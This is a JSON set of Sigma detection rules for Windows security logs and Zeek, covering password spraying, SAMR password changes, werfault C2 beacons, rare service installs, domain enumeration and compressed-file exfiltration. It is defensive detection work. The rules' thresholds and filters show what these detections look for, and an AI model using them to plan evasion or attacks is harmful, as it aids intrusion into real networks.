    "content": "title: Failed Logins with Different Accounts from Single Source System\nid: e98374a6-e2d9-4076-9b5c-11bdb2569995\nstatus: unsupported\ndescription: Detects suspicious failed logins with different user accounts from a single source system\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/01/10\nmodified: 2023/02/24\ntags:\n    - attack.persistence\n    - attack.privilege_escalation\n    - attack.t1078\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID:\n            - 529\n            - 4625\n        TargetUserName: '*'\n        WorkstationName: '*'\n    condition: selection1 | count(TargetUserName) by WorkstationName > 3\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source2.yml",
    "content": "title: Failed NTLM Logins with Different Accounts from Single Source System\nid: 6309ffc4-8fa2-47cf-96b8-a2f72e58e538\nrelated:\n    - id: e98374a6-e2d9-4076-9b5c-11bdb2569995\n      type: derived\nstatus: unsupported\ndescription: Detects suspicious failed logins with different user accounts from a single source system\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/01/10\nmodified: 2023/02/24\ntags:\n    - attack.persistence\n    - attack.privilege_escalation\n    - attack.t1078\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection2:\n        EventID: 4776\n        TargetUserName: '*'\n        Workstation: '*'\n    timeframe: 24h\n    condition: selection2 | count(TargetUserName) by Workstation > 3\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source_kerberos.yml",
    "content": "title: Valid Users Failing to Authenticate From Single Source Using Kerberos\nid: 5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98\nstatus: unsupported\ndescription: Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco, frack113\ndate: 2021/06/01\nmodified: 2023/03/13\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4771\n        Status: '0x18'\n    filter_computer:\n        TargetUserName|endswith: '$'\n    timeframe: 24h\n    condition: selection and not filter_computer | count(TargetUserName) by IpAddress > 10\nfalsepositives:\n    - Vulnerability scanners\n    - Misconfigured systems\n    - Remote administration tools\n    - VPN terminators\n    - Multiuser systems like Citrix server farms\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source_kerberos2.yml",
    "content": "title: Disabled Users Failing To Authenticate From Source Using Kerberos\nid: 4b6fe998-b69c-46d8-901b-13677c9fb663\nstatus: unsupported\ndescription: Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco, frack113\ndate: 2021/06/01\nmodified: 2023/03/13\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4768\n        Status: '0x12'\n    filter_computer:\n        TargetUserName|endswith: '$'\n    timeframe: 24h\n    condition: selection and not filter_computer | count(TargetUserName) by IpAddress > 10\nfalsepositives:\n    - Vulnerability scanners\n    - Misconfigured systems\n    - Remote administration tools\n    - VPN terminators\n    - Multiuser systems like Citrix server farms\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source_kerberos3.yml",
    "content": "title: Invalid Users Failing To Authenticate From Source Using Kerberos\nid: bc93dfe6-8242-411e-a2dd-d16fa0cc8564\nstatus: unsupported\ndescription: Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco, frack113\ndate: 2021/06/01\nmodified: 2023/03/13\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4768\n        Status: '0x6'\n    filter_computer:\n        TargetUserName|endswith: '$'\n    timeframe: 24h\n    condition: selection and not filter_computer | count(TargetUserName) by IpAddress > 10\nfalsepositives:\n    - Vulnerability scanners\n    - Misconfigured systems\n    - Remote administration tools\n    - VPN terminators\n    - Multiuser systems like Citrix server farms\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source_ntlm.yml",
    "content": "title: Valid Users Failing to Authenticate from Single Source Using NTLM\nid: f88bab7f-b1f4-41bb-bdb1-4b8af35b0470\nstatus: unsupported\ndescription: Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco\ndate: 2021/06/01\nmodified: 2023/03/13\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4776\n        Status: '*0xC000006A' #Account logon with misspelled or bad password.\n    filter:\n        TargetUserName: '*$'\n    timeframe: 24h\n    condition: selection1 and not filter | count(TargetUserName) by Workstation > 10\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source_ntlm2.yml",
    "content": "title: Invalid Users Failing To Authenticate From Single Source Using NTLM\nid: 56d62ef8-3462-4890-9859-7b41e541f8d5\nstatus: unsupported\ndescription: Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco\ndate: 2021/06/01\nmodified: 2023/03/13\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4776\n        Status: '*0xC0000064' # The username you typed does not exist. Bad username.\n    filter:\n        TargetUserName: '*$'\n    timeframe: 24h\n    condition: selection1 and not filter | count(TargetUserName) by Workstation > 10\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_remote_logons_single_source.yml",
    "content": "title: Multiple Users Remotely Failing To Authenticate From Single Source\nid: add2ef8d-dc91-4002-9e7e-f2702369f53a\nstatus: unsupported\ndescription: Detects a source system failing to authenticate against a remote host with multiple users.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco\ndate: 2021/06/01\nmodified: 2023/02/24\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4625\n        LogonType: 3\n    filter:\n        IpAddress: '-'\n    timeframe: 24h\n    condition: selection1 and not filter | count(TargetUserName) by IpAddress > 10\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_multiple_files_renamed_or_deleted.yml",
    "content": "title: Suspicious Multiple File Rename Or Delete Occurred\nid: 97919310-06a7-482c-9639-92b67ed63cf8\nstatus: unsupported\ndescription: Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).\nreferences:\n    - https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html\nauthor: Vasiliy Burov, oscd.community\ndate: 2020/10/16\nmodified: 2023/02/24\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Policies/Windows Settings/Security Settings/Local Policies/Audit Policy/Audit object access, Policies/Windows Settings/Security Settings/Advanced Audit Policy Configuration/Object Access'\ndetection:\n    selection:\n        EventID: 4663\n        ObjectType: 'File'\n        AccessList: '%%1537'\n        Keywords: '0x8020000000000000'\n    timeframe: 30s\n    condition: selection | count() by SubjectLogonId > 10\nfalsepositives:\n    - Software uninstallation\n    - Files restore activities\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_samr_pwset.yml",
    "content": "title: Possible Remote Password Change Through SAMR\nid: 7818b381-5eb1-4641-bea5-ef9e4cfb5951\nstatus: unsupported\ndescription: |\n  Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().\n  \"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.\nauthor: Dimitrios Slamaris\ndate: 2017/06/09\nmodified: 2023/02/24\ntags:\n    - attack.credential_access\n    - attack.t1212\nlogsource:\n    product: windows\n    service: security\ndetection:\n    samrpipe:\n        EventID: 5145\n        RelativeTargetName: samr\n    passwordchanged:\n        EventID: 4738\n    passwordchanged_filter:\n        PasswordLastSet:\n    timeframe: 15s\n    condition: ( passwordchanged and not passwordchanged_filter ) | near samrpipe\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_susp_failed_hidden_share_mount.yml",
    "content": "title: Failed Mounting of Hidden Share\nid: 1c3be8c5-6171-41d3-b792-cab6f717fcdb\nstatus: unsupported\ndescription: Detects repeated failed (outgoing) attempts to mount a hidden share\nreferences:\n    - https://twitter.com/moti_b/status/1032645458634653697\n    - https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5\nauthor: Fabian Franz\ndate: 2022/08/30\nmodified: 2023/02/24\ntags:\n    - attack.t1021.002\n    - attack.lateral_movement\nlogsource:\n    product: windows\n    service: smbclient-security\ndetection:\n    selection:\n        EventID: 31010\n        ShareName|endswith: '$'\n    timeframe: 1m\n    condition: selection | count() > 10\nfields:\n    - ShareName\nfalsepositives:\n    - Legitimate administrative activity\n    - Faulty scripts\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_suspicious_werfault_connection_outbound.yml",
    "content": "title: Suspicious Werfault.exe Network Connection Outbound\nid: e12c75f2-d09e-43f6-90e4-6a23842907af\nstatus: experimental\ndescription: Adversaries can migrate cobalt strike/metasploit/C2 beacons on compromised systems to legitimate werfault.exe process to avoid detection.\nreferences:\n    - https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/\nauthor: Sreeman\ndate: 2021/03/09\nmodified: 2021/06/11\ntags:\n    - attack.command_and_control\n    - attack.t1571\nlogsource:\n  product: windows\n  category: network_connection\ndetection:\n  selection:\n    Image: 'werfault.exe'\n  filter1:\n    ParentImage: 'svchost.exe'\n  filter2:\n    DestinationIp:\n        - '104.42.151.234'\n        - '104.43.193.48'\n        - '52.255.188.83'\n        - '13.64.90.137'\n        - '168.61.161.212'\n        - '13.88.21.125'\n        - '40.88.32.150'\n        - '52.147.198.201'\n        - '52.239.207.100'\n        - '52.176.224.96'\n        - '2607:7700:0:24:0:1:287e:1894'\n        - '10.*'\n        - '192.168.*'\n        - '127.*'\n  filter3:\n    DestinationHostname|contains:\n        - '*.windowsupdate.com'\n        - '*.microsoft.com'\n  condition: selection and not ( filter1 and filter2 and filter3 )\nfalsepositives:\n    - Communication to other corporate systems that use IP addresses from public address spaces and Microsoft IP spaces\nlevel: medium"
  },
  {
    "path": "unsupported/windows/win_system_rare_service_installs.yml",
    "content": "title: Rare Service Installations\nid: 66bfef30-22a5-4fcd-ad44-8d81e60922ae\nstatus: unsupported\ndescription: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/03/08\nmodified: 2023/02/24\ntags:\n    - attack.persistence\n    - attack.privilege_escalation\n    - car.2013-09-005\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    timeframe: 7d\n    condition: selection | count() by ServiceName < 5\nfalsepositives:\n    - Software installation\n    - Software updates\nlevel: low\n"
  },
  {
    "path": "unsupported/windows/win_taskscheduler_rare_schtask_creation.yml",
    "content": "title: Rare Scheduled Task Creations\nid: b20f6158-9438-41be-83da-a5a16ac90c2b\nstatus: unsupported\ndescription: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/03/17\nmodified: 2023/02/24\ntags:\n    - attack.persistence\n    - attack.s0111\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: taskscheduler\n    definition: the \"Microsoft-Windows-TaskScheduler/Operational\" is disabled by default and should be enabled in order for this detection to work\ndetection:\n    selection:\n        EventID: 106\n    filter1:\n        TaskName: \\Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\n    timeframe: 7d\n    condition: selection and not 1 of filter* | count() by TaskName < 5\nfalsepositives:\n    - Software installation\nlevel: low\n"
  },
  {
    "path": "unsupported/zeek/zeek_dce_rpc_domain_user_enumeration.yml",
    "content": "title: Domain User Enumeration Network Recon 01\nid: 66a0bdc6-ee04-441a-9125-99d2eb547942\nstatus: unsupported\ndescription: |\n    Domain user and group enumeration via network reconnaissance.\n    Seen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.\n    The rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/37\nauthor: 'Nate Guagenti (@neu5ron), Open Threat Research (OTR)'\ndate: 2020/05/03\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1087.002\n    - attack.t1082\nlogsource:\n    product: zeek\n    service: dce_rpc\ndetection:\n    selection:\n        operation:\n            #- LsarEnumerateTrustedDomains #potentially too many FPs, removing. caused by netlogon\n            #- SamrEnumerateDomainsInSamServer #potentially too many FPs, removing. #method obtains a listing of all domains hosted by the server side of this protocol. This value is a cookie that the server can use to continue an enumeration on a subsequent call\n            - LsarLookupNames3 #method translates a batch of security principal names to their SID form\n            - LsarLookupSids3 #translates a batch of security principal SIDs to their name forms\n            - SamrGetGroupsForUser #obtains a listing of groups that a user is a member of\n            - SamrLookupIdsInDomain #method translates a set of RIDs into account names\n            - SamrLookupNamesInDomain #method translates a set of account names into a set of RIDs\n            - SamrQuerySecurityObject #method queries the access control on a server, domain, user, group, or alias object\n            - SamrQueryInformationGroup #obtains attributes from a group object\n    timeframe: 30s\n    condition: selection | count(operation) by src_ip > 4\nfalsepositives:\n    - Devices that may do authentication like a VPN or a firewall that looksup IPs to username\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "unsupported/zeek/zeek_http_exfiltration_compressed_files.yml",
    "content": "title: Potential Exfiltration of Compressed Files\nid: 0d47e3f6-357f-4534-928c-202631d065fa\nstatus: unsupported\ndescription: |\n    This rule detects potential exfiltration by looking for a few compression extensions in the uri and signs of compression in the mime type, file type, and http body\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/17\nauthor: Greg Howell, OTR (Open Threat Research)\ndate: 2020/04/05\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1560.001\n    - attack.t1005\nlogsource:\n    product: zeek\n    service: http\ndetection:\n    selection1:\n        uri|endswith:\n         - '.7z'\n         - '.zip'\n         - '.rar'\n        mime_types|endswith: 'compressed'\n    selection3:\n        filetype|endswith: 'compressed'\n    selection4:\n        http.bodyMagic|endswith: 'compressed'\n        http.method: PUT\n    condition: selection1 or selection3 or selection4\nfalsepositives:\n    - Legitimate upload/download of archives\nlevel: medium\n"
  }
]